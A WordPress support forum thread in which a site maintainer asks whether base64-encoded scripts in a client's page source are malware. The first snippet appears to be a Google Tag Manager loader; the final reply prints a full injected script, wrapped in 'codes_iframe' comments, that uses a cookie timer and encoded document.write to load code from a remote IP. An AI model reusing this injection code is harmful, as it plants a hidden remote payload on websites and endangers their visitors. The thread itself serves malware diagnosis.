JavaScript virus injection Reason: encoded data:text/javascript Code

  • Resolved SRD75

    (@srd75)


    3 years, 2 months ago

    Hi Folks,

    https://www.siteguarding.com/ shows a number of alerts for my client’s website such as:

    JavaScript virus injection Reason: encoded data:text/javascript Code: script src=”data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2go

    In the source code I see:

    <script src="data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOm5ldyBEYXRlKCkuZ2V0VGltZSgpLGV2ZW50OidndG0uanMnfSk7dmFyIGY9ZC5nZXRFbGVtZW50c0J5VGFnTmFtZShzKVswXSxqPWQuY3JlYXRlRWxlbWVudChzKSxkbD1sIT0nZGF0YUxheWVyJz8nJmw9JytsOicnO2ouYXN5bmM9ITA7ai5zcmM9J2h0dHBzOi8vd3d3Lmdvb2dsZXRhZ21hbmFnZXIuY29tL2d0bS5qcz9pZD0nK2krZGw7Zi5wYXJlbnROb2RlLmluc2VydEJlZm9yZShqLGYpfSkod2luZG93LGRvY3VtZW50LCdzY3JpcHQnLCdkYXRhTGF5ZXInLCdHVE0tUEIzTlJLOScp" defer></script>

    Wordfence is not detecting any of these.

    I am not the developer of the website, I am doing maintenance.

    Are these viruses?

    Thanks,
    Steve

    The page I need help with: [log in to see the link]

Viewing 5 replies - 1 through 5 (of 5 total)
  • Plugin Support WFAdam

    (@wfadam)

    Hello @srd75 and thanks for reaching out to us!

    I am not familiar with siteguarding.com but I did check your site against VirusTotal. I did not find any issues on your site.

    Could you do me a favor and run a High Sensitivity scan? You can do this by navigating to Wordfence > Scan > Manage Scan > High Sensitivity and then SAVE. Now head back over to the Scan page and run the scan until it finishes.

    Let me know if you find any results!

    Thanks again!

    Thread Starter SRD75

    (@srd75)

    Hi Adam,

    I’ve done that and no issues were found by Wordfence.

    This does not mean that the injected script is gone, though.

    It is still present in the source code of the home page when logged out of admin.

    Cheers,
    Steve

    @srd75 I removed your relative empty comment from 20 minutes ago. For technical reasons, other users may not get a reminder when you post. And also: this is just a forum where people come and go. We see a lot of “abandoned topics” – if a good reply helped the original poster, they often never respond at all. And that’s OK, since these are not tickets…

    Plugin Support WFAdam

    (@wfadam)

    @srd75 I believe I have assisted you elsewhere. I will help you in your email.

    This doesn’t seem to be resolved

    This was not detected on high Sensitivity scan
    <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘JavaScript virus injection Reason: encoded data:text/javascript Code’ is closed to new replies.